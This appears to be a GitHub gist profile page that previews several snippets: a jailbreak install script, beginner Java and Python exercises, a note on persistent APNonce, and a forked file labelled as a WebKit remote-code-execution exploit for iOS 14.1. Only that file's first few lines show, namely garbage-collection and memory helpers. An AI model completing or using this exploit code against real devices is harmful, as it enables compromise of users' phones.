Skip to content

Instantly share code, notes, and snippets.

View MichelePipi's full-sized avatar
🎯
Chat is this real

Michele MichelePipi

🎯
Chat is this real
View GitHub Profile
@MichelePipi
MichelePipi / odysseyra1n.english
Created February 12, 2022 13:01
Odysseyra1n Install Script but in English
When Run:
Install Odysseyra1n
import os
import platform
arch_type = platform.uname()
arm64 = False
if 'arm64' in platform.uname():
print("arm64 detected (M1 probably)")
arm64 = True
else:
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
public class Main {
public static void main(String[] args) {
// write your code here
int[] nums = new int[]{801, 7317, 3946, 240, 9935, 4293, 7260, 3414, 1533, 786, 6297, 3946, 4355, 2535, 4919};
@MichelePipi
MichelePipi / assignment.py
Created June 29, 2021 00:58
Python Assignment
import time
# Write a program for a McDonalds Happy Meal ordering app
# At the end of the program, it should print out something like this
#
# Happy Meal 1 wants nuggets, fries, juice and doll
# Happy Meal 2 wants cheeseburger, fruit, juice and car
# Happy Meal 3 wants cheeseburger, fries, soda and car
# The total cost is 15 dollars
#
@MichelePipi
MichelePipi / README.md
Last active June 13, 2021 13:21
Persistent APNonce

Write-Up for a chance at a persistent APNonce, even after a full restore.

Credits:

  • Sloopie
  • Ava#0152
  • Tanbeer
@MichelePipi
MichelePipi / fuck.js
Created May 22, 2021 04:49 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));